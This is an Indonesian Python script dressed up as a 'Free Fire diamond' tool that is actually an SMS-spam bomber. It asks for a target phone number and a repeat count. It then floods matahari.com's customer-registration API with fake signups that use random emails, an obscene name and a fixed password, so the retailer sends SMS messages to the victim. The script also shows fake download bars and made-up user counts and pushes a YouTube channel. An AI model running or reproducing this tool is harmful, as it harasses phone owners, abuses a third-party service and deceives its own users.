try:    # Janggan di ubah
        import sys,os,json,requests,random,time
        #mengetik otomatis
        def mengetik(z):
            for e in z + "\n":
                sys.stdout.write(e)
                sys.stdout.flush()
                time.sleep(0.0)

except ModuleNotFoundError:
         print ('[!] Install Modul Requests')
         os.system('pip install requests')
        
try:    # Janggan di ubah
        ip = requests.get('https://api.ipify.org').text
except requests.exceptions.ConnectionError:
        exit(' [!] Koneksi Internet Error')

# Janggan di ubah
Email = random.choice(['lavon.lockman@gmail.com','duane_mclaughlin38@gmail.com','alfreda.lindgren@gmail.com','leonardo_kuhlman@gmail.com','lyric51@gmail.com','devonte_littel@gmail.com','newell.kuhic@gmail.com'])
# Janggan di ubah
Name = random.choice(["VXO ngentod","VXO ngentod","VXO ngentod","VXO ngentod","VXO ngentod"])

a,m,h,k,b,u,c,p,o, = [
'\033[90m',
'\033[31m',
'\033[32m',
'\033[33m',
'\033[94m',
'\033[35m',
'\033[36m',
'\033[37m',
'\033[0m',
]
os.system('clear')
print ('\033[35m__________________________________________________________\033[35m')
count = 0

for t in range(101):
    time.sleep(0.0)
    print(f"\rNENDOWNLOAD DATA SABAR ❗ :  {t}%" , end="" , flush=True)
    if count == 3:
        count = 0
print ('\033[32m BERHASIL\033[32m \033[33m[√]\033[33m')
print ('')
count = 0

for t in range(101):
    time.sleep(0.0)
    print(f"\rNENDOWNLOAD TOOLS SABAR❗ :  {t}%", end="", flush=True)
    if count == 3:
        count = 0
print (' \033[32m BERHASIL\033[32m \033[33m[√]\033[33m')
print ('\033[33m__________________________________________________________\033[33m')
mengetik('\033[32mSUBSCRIBE DULUH YT KZ.TUTORIAL BIAR WORK\033[32m \033[36m•﹏•\033[36m')
time.sleep(4)
os.system('xdg-open https://youtube.com/channel/UCRaVHUXQGVAH7Gof7kixIoQ')
os.system('clear')
# Di ubah sesuai kalian 
# Subscribe dulu :)

print ('\033[35m  ╔═══════╗\033[35m')
print ('\033[32m  ║       ║\033[32m   \033[36m - TOOLS VIP DIAMOND -\033[36m')
print ('\033[33m╔═══════════╗\033[33m')
print ('\033[33m║\033[33m \033[32mFREE FIRE\033[32m\033[33m ║\033[33m \033[36m * Creator  : kz.tutirial\033[33m')
print ('\033[33m║\033[33m \033[35m DIAMOND\033[35m\033[33m║\033[33m  \033[36m* Youtube  : Kz.tutorial\033[33m')
print ('\033[33m╚═══════════╝\033[33m')

banner = """
             \033[32m( \033[37mSpam Sms \033[33mMatahari \033[32m| \033[37mBY \033[33mKz.tutorial \033[32m) \033[32m(\033[37mV.1\033[32m)
             \033[37m[\033[32m1\033[37m] \033[37mCreator \033[31m: \033[33mKZ.tutorial
             \033[37m[\033[32m2\033[37m] \033[33mGithub  \033[31m: \033[37m/JulioPangkeyV1
             \033[37m[\033[32m3\033[37m] \033[32mWhatsaap \033[31m: \033[33m085757051840
\033[35m⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤⏤"""
print ('')
print ('\033[36m_____________________________________________________\033[36m')
mengetik('\033[33m••••••••••••\033[33m\033[94m SELAMAT DATANG\033[37m \033[94m DI TOOLS KAMI\033[33m ••••••••••')
print ('\033[36m-----------------------------------------------------\033[36m')
print ('\033[31m______________________________________________________\033[31m')
print ('%s[%s+%s] %sIP Kamu %      s: %s%s    ' % (p,h,p,k,m,h,ip))
print ('\033[35m[+]\033[35m \033[33OKamu orang\033[33m \033[37m : Indonesia\033[33m')
print ('\033[37m[+]\033[37m \033[32mpenguna tools \033[32m : \033[33m2133\033[33m \033[35morang\033[35m')
print ('\033[33m[+]\033[33m \033[37mStatus pengguna \033[317 : \033[32monline\033[32m')
print ('\033[37m[+]\033[37m \033[36mSecript Sms Brutal \033[36m : \033[33mON\033[33m')
print ('\033[31m______________________________________________________\033[31m')
print ('')
print ('\033[33m[1]\033[33m \033[32mGasken Spam\033[32m ')
print ('')
pilih = input("\033[33;1mMasukkan Pilihan Anda\033[33;1m \033[33;1m:\033[33;1m ")
time.sleep(4)
no = input('\n\033[37m[\033[33m•\033[37m] \033[33mex \033[31m: \033[32m08xx\n\033[37m[\033[32m+\033[37m] \033[33mPhone\033[31m:\033[32m ')
if no =='':
   exit('\033[37m[\033[31m!\033[37m] Janggan Kosong lurs')
elif len(no) <= 9:
   exit('\033[37m[\033[31m!\033[37m] Nomor Tidak Valid ')
else:
   jml = int(input('\n\033[37m[\033[32m+\033[37m] \033[33mJumlah\033[31m:\033[32m '))


# Janggan di ubah
heder = {'Host': 'www.matahari.com',
           'content-length': '240',
           'origin': 'https://www.matahari.com',
           'x-newrelic-id': 'Vg4GVFVXDxAGVVlVBgcGVlY=',
           'content-type': 'application/json',
           'accept': '*/*',
           'user-agent': 'Mozilla/5.0 (Linux; Android 11; vivo 2007) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36',
           'save-data': 'on',
           'sec-fetch-site': 'same-origin',
           'sec-fetch-mode': 'cors',
           'sec-fetch-dest': 'empty',
           'referer': 'https://www.matahari.com/customer/account/create/',
           'accept-encoding': 'gzip, deflate, br',
           'accept-language': 'id-ID,id;q=0.9,en;q=0.8'}

# Janggan di ubah
data = {
        "thor_customer": {
		"name": Name,
		"email_address": Email,
		"mobile_country_code": "+62",
		"gender_id": "1",
		"mobile_number": no,
		"mro": "",
		"password": "Wadepak1037",
		"birth_date": "04/02/2022"
		}
	}

print("\n\033[37m[\033[31m!\033[37m] \033[32mMessage ..\n")
for i in range(jml):
      # Janggan di ubah
      sec = requests.post('https://www.matahari.com/rest/V1/thorCustomers', headers=heder, json=data)
      if 'Success' in sec.text:
           print(f'\033[37m[\033[35m{i+1}\033[37m] \033[33mMessage \033[31m: \033[32mSPAM BERHASIL MELUNCUR\033[32m \033[36m[√]\033[36m')
      else:
           print(f'\033[37m[\033[35m{i+1}\033[37m] \033[33mMessage \033[31m: \033[31mSPAM GAGAL MELUNCUR [X]')
      time.sleep(1.5)
print ('\n\033[37m[\033[32m√\033[37m] \033[37mSpam Selesai \033[33m:)')
print ('\n\033[31m[•] SUBSCRIBE DULUH\033[31m] \033[32m[•] YT KZ.TUTORIAL\033[32m')
print ('')
